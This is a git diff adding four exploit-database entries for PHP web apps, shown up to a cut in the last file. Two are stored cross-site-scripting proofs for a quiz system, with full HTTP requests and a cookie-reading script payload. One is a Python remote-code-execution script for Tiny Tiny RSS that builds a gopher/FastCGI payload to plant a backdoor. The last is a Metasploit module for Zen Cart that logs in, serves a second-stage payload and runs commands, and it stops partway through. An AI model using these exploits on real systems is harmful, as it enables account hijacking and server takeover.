diff --git a/exploits/php/webapps/49605.txt b/exploits/php/webapps/49605.txt
new file mode 100644
index 000000000..e8e450999
--- /dev/null
+++ b/exploits/php/webapps/49605.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: Praharsh Kumar Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+# Vulnerability Type: Cross-site Scripting
+# Vulnerability: Persistent/Stored XSS
+# Tested on: Parrot OS
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in adding questions in options parameter affected from this vulnerability.
+# payload:
+
+POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
+Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+
+qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
+
+POC:
+# go to url http://localhost:8080/admin.php
+# login and add question
+# then put the above payload in MCQ options parameter
+# then fill the remaining details
+# then click add
+# go to url http://localhost:8080/login.php
+# then login to user account
+# then attempt the quiz while attempting the quiz xss pop up there..!
\ No newline at end of file
diff --git a/exploits/php/webapps/49606.py b/exploits/php/webapps/49606.py
new file mode 100755
index 000000000..808031cf2
--- /dev/null
+++ b/exploits/php/webapps/49606.py
@@ -0,0 +1,83 @@
+# Exploit Title: Tiny Tiny RSS - Remote Code Execution
+# Date: 21/09/2020
+# Exploit Author: Daniel Neagaru & Benjamin Nadarević
+# Blog post: https://www.digeex.de/blog/tinytinyrss/
+# Software Link: https://git.tt-rss.org/fox/tt-rss
+# Version: all before 2020-09-16
+# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
+# Tested on: default docker installation method
+# CVE : CVE-2020-25787
+
+#!/usr/bin/env python3
+
+from sys import argv
+import urllib.parse as ul
+import base64
+
+
+def CustomFcgi( filename, output, backdoor):
+ length=len(output)+len(backdoor)+64
+ char=chr(length)
+
+ data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
+ data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
+ data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
+
+ temp1 = chr(len(data) // 256)
+ temp2 = chr(len(data) % 256)
+ temp3 = chr(len(data) % 8)
+
+ end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
+ end += "\x00\x00\x00\x00"
+ start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
+
+ payload = start + data + end
+ def get_payload(payload):
+ finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
+ return finalpayload
+
+ return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
+
+
+
+TTRSS_PATH = "/var/www/html/tt-rss/"
+BACKDOOR_CODE = """
+
+"""
+
+
+feed_file = open("malicious_RCE_feed.xml",'w')
+filename = TTRSS_PATH + "config.php"
+output = TTRSS_PATH + "backdoor.php"
+
+backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
+rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
+
+feed ="""
+
+
+
+ Exploit demo - rce
+
+ You are getting infected :(
+ -
+ Check if there is backdoor.php
+
+
+
+
+ ]]>
+
+
+
+
+""".format(rce)
+
+feed_file.write(feed)
+feed_file.close()
\ No newline at end of file
diff --git a/exploits/php/webapps/49607.txt b/exploits/php/webapps/49607.txt
new file mode 100644
index 000000000..cdca60fa2
--- /dev/null
+++ b/exploits/php/webapps/49607.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: P.Naveen Kumar
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software : Web Based Quiz System
+# Version : 1.0
+# Vulnerability Type : Cross-site Scripting
+# Vulnerability : Persistent/Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in registration form in name parameter affected from this vulnerability.
+# payload:
+
+# HTTP POST request
+POST http://localhost:8080/quiz/register.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
+Content-Length: 690
+Origin: http://localhost:8080
+Connection: keep-alive
+Referer: http://localhost:8080/quiz/register.php
+Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
+Upgrade-Insecure-Requests: 1
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="email"
+
+test123@gmail.com
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="password"
+
+Hacker
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="college"
+
+hello
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------283640616528311462411171270636--
+
+POC:
+# go to url http://localhost:8080/quiz/register.php
+# then you have to fill the above payload in name/username parameter
+# then fill the remaining details
+# then click submit
+# then login to user account
+# then attempt any one quiz after attempting go to ranking section then
+# you can see xss pop up there..!
\ No newline at end of file
diff --git a/exploits/php/webapps/49608.rb b/exploits/php/webapps/49608.rb
new file mode 100755
index 000000000..1afa95e0e
--- /dev/null
+++ b/exploits/php/webapps/49608.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+#
+# This exploit write payload in database and trig to command
+# a bug in an zencart v1.5.7b web application
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'zencart authenticated remote code execution exploit',
+ 'Description' => %q(
+ This exploit module execution os command in zencart.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Mucahit Saratar '], # msf module & research & poc
+ 'References' =>[
+ [ 'OSVDB', '' ],
+ [ 'EDB', '' ],
+ [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
+ [ 'CVE', '2021-3291']
+ ],
+ 'Platform' => 'php',
+ 'Privileged' => false,
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [ ['Automatic', { }] ],
+ 'DisclosureDate' => '2021-01-22',
+ 'DefaultTarget' => 0
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+ OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+ OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
+ OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+ OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+ OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+ ], self.class
+ )
+ end
+
+ def start_server
+ ssltut = false
+ if datastore["SSL"]
+ ssltut = true
+ datastore["SSL"] = false
+ end
+ start_service({'Uri' => {
+ 'Proc' => Proc.new { |cli, req|
+ on_request_uri(cli, req)
+ },
+ 'Path' => resource_uri
+ }})
+ print_status("payload is on #{get_uri}")
+ @adresim = get_uri
+ datastore['SSL'] = true if ssltut
+ end
+
+ def on_request_uri(cli, request)
+ print_good('First stage is executed ! Sending 2nd stage of the payload')
+ send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
+ end
+
+ def tabanyol
+ datastore["BASEPATH"]
+ end
+
+ def isim
+ datastore["USERNAME"]
+ end
+
+ def parola
+ datastore["PASSWORD"]
+ end
+
+
+ def login
+ #"index.php?cmd=login&camefrom=index.php"
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'cmd' => 'login',
+ 'camefrom' => 'index.php'
+ })
+ #
+ unless res
+ fail_with(Failure::Unreachable, "Access web application failure")
+ end
+ if res.code != 200
+ fail_with(Failure::Unreachable, "we not have 200 response")
+ end
+
+ if !res.get_cookies.empty?
+ @cookie = res.get_cookies
+ @csrftoken = res.body.scan(//).flatten[0] || ''
+ if @csrftoken.empty?
+ fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+ end
+ vprint_good("login Csrf token: "+@csrftoken)
+ end
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'securityToken' => @csrftoken,
+ 'action' => "do"+@csrftoken,
+ 'admin_name' => isim,
+ 'admin_pass' => parola
+ })
+ if res.code != 302
+ fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+ end
+ true
+ end
+
+
+ def check
+ unless login
+ fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+ return CheckCode::NotVulnerable('Wrong credentials')
+ end
+ print_good("We loged in")
+ Exploit::CheckCode::Vulnerable
+ CheckCode::Vulnerable('Authenticated successfully')
+
+ end
+
+ def exploit
+ check
+ start_server
+ sleep(4)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+ 'vars_get' => {
+ 'cmd' => 'modules',
+ 'set' => datastore["MODULE"],
+ 'module' => datastore["SETTING"],
+ 'action' => 'edit'
+ },
+ 'cookie' => @cookie
+ )
+ if res.code != 200
+ fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+ end
+ #
+ if res && res.code == 200
+ @formtoken = res.body.scan(//).flatten[0] || ''
+ if @formtoken.empty?
+ fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
+ end
+ #print_good(@formtoken)
+ #